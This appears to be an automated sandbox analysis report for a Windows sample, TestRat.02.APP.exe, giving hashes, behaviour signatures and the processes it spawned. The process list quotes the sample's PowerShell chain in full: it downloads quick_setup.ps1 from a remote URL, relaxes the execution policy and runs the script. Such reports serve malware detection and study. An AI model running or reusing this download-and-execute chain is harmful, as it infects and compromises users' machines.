Analysis
-
max time kernel
146s -
max time network
152s -
platform
windows11-21h2_x64 -
resource
win11-20240709-en -
resource tags
arch:x64arch:x86image:win11-20240709-enlocale:en-usos:windows11-21h2-x64system -
submitted
22-07-2024 17:00
Static task
static1
Behavioral task
behavioral1
Sample
TestRat.02.APP.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral2
Sample
TestRat.02.APP.exe
Resource
win11-20240709-en
Behavioral task
behavioral3
Sample
TestRat.02.APP.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral4
Sample
TestRat.02.APP.exe
Resource
win11-20240709-en
General
-
Target
TestRat.02.APP.exe
-
Size
139KB
-
MD5
6d75b31bfa691bdf32c0c9331c8b7ff7
-
SHA1
5387d89075eb924adca7318add02c0bca8812a9e
-
SHA256
fb1e3c46ce349e7ae853621f708fe0bfa08e142b6f6262dc9ab6f8e03cb5380f
-
SHA512
ca08fd9ed2543ff13167f57e27fe4fbb6a395161e25902b7c9ec562034f6cb9aa24f2a32c04341b5ac29c49bd683393856742bd0f400e2c0cc660760ab2b7b83
-
SSDEEP
3072:CAi4pxpEHmAdx4/kyHRZa0YiRAl278IVn2JbS1cJA8lW7:CAi4pxpRkyHRZa0Gl278IVNc2cW
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 2 4680 powershell.exe 3 4680 powershell.exe -
pid Process 4680 powershell.exe 4092 powershell.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 4680 powershell.exe 1564 powershell.exe 4092 powershell.exe 1564 powershell.exe 4680 powershell.exe 4092 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 4680 powershell.exe Token: SeDebugPrivilege 1564 powershell.exe Token: SeDebugPrivilege 4092 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 996 wrote to memory of 4680 996 TestRat.02.APP.exe 83 PID 996 wrote to memory of 4680 996 TestRat.02.APP.exe 83 PID 996 wrote to memory of 4092 996 TestRat.02.APP.exe 84 PID 996 wrote to memory of 4092 996 TestRat.02.APP.exe 84 PID 996 wrote to memory of 1564 996 TestRat.02.APP.exe 85 PID 996 wrote to memory of 1564 996 TestRat.02.APP.exe 85
Processes
-
C:\Users\Admin\AppData\Local\Temp\TestRat.02.APP.exe"C:\Users\Admin\AppData\Local\Temp\TestRat.02.APP.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:996 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Invoke-WebRequest -Uri https://github.com/Daulaires/Daulaires/releases/download/Lester/quick_setup.ps1 -OutFile quick_setup.ps12⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4680
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-ExecutionPolicy RemoteSigned -Scope CurrentUser -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4092
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" .\quick_setup.ps12⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1564
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:1468
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD54ef3b165311abe48029443c0a529747f
SHA1ad65cc913ed3805d813bc16337c7f6d2a97b55d9
SHA256c2c563dddc3df7fda0e246d9988718b315a9704335312d5ddfb1768efa1655ff
SHA512696e3deb942e4f6d3980a831668bfd40a8bee586cca3e4ca5a85aeae482af5c8c5ae21e319b4483345c582b7a61d51220c8ccce0072497a8ee53e1e87ac5e99a
-
Filesize
944B
MD5e3840d9bcedfe7017e49ee5d05bd1c46
SHA1272620fb2605bd196df471d62db4b2d280a363c6
SHA2563ac83e70415b9701ee71a4560232d7998e00c3db020fde669eb01b8821d2746f
SHA51276adc88ab3930acc6b8b7668e2de797b8c00edcfc41660ee4485259c72a8adf162db62c2621ead5a9950f12bfe8a76ccab79d02fda11860afb0e217812cac376
-
Filesize
1KB
MD5b94a5f9c019b614942fc29d049e77006
SHA17d22a700e14c52c6ded2a26cc063057b779d5c2e
SHA256ac01c39f1027c82f8d739b7a15c8fc17875bf33f3069f9acf0eb4a0d3b8803d7
SHA512301825dd58920d02a28650c9bd9a43d36d5d896fa72b79b49792a868f2df4d419dd6fdfe245f544f8becaff9585e63050fe2e6979dbc35a592017423a392633e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82